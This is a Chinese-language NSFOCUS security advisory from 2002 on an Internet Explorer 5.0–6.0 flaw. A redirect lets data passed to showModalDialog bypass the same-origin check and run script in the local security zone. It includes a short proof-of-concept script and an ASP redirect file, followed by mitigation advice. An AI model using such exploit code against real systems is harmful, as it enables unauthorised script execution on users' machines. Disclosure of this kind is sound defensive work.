首页 -> 安全研究
安全研究
安全漏洞
Microsoft IE Dialog同源策略可绕过漏洞
发布日期:2002-04-16
更新日期:2002-04-25
受影响系统:
Microsoft Internet Explorer 5.0描述:
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.5SP1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.5SP2
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
BUGTRAQ ID: 4527
Microsoft Internet Explorer是Microsoft公司开发和维护的WEB浏览器,其中可以通过脚本调用两个函数showModalDialog和showModelessDialog支持对话窗口。这些函数接收用于对话内容的URL定位,存在一个选项参数以允许数据从调用页面中传递给对话框。
Microsoft Internet Explorer在传递给对话框数据的安全检查处理存在问题,可导致攻击者以本地(intranet)安全区域上下文执行任意脚本代码。
为了保证只允许把位于在同一域中的调用页面中数据传递给对话框,IE对此会进行安全检查,如:当从另一个协议,端口或者域名( http://jscript.dk )打开对话框( res://shdoclc.dll/policyerror.htm )时,IE验证代码会确保没有对象传输,而且没有任何交互,这是为了防止恶意一方把任意数据内容插入到任意对话框中。但是如果对话框资源中提供的URL重定向到另一个位置,IE只对原始URL进行安全检查,而不对最后的URL进行检查,这样就可以导致绕过安全检查,插入任意数据到对话框,并在本地计算机安全区域中执行。
<*来源:Thor Larholm (Thor@jubii.dk)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0190.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script>
var sCode = '<'+'script>alert("This is running from: " +
location.href);top.close()</'+'script>';
window.showModalDialog("redirect.asp", {url:sCode})
</script>
Redirect.asp代码包含如下内容:
<%@Language=Jscript%><%Response.Redirect("res://shdoclc.dll/policyerror.htm");%>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 不要用IE浏览一些不可信的站点。
* 暂时关闭脚本执行选项直至有补丁下载。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
浏览次数:3306
严重程度:0(网友投票)
绿盟科技给您安全的保障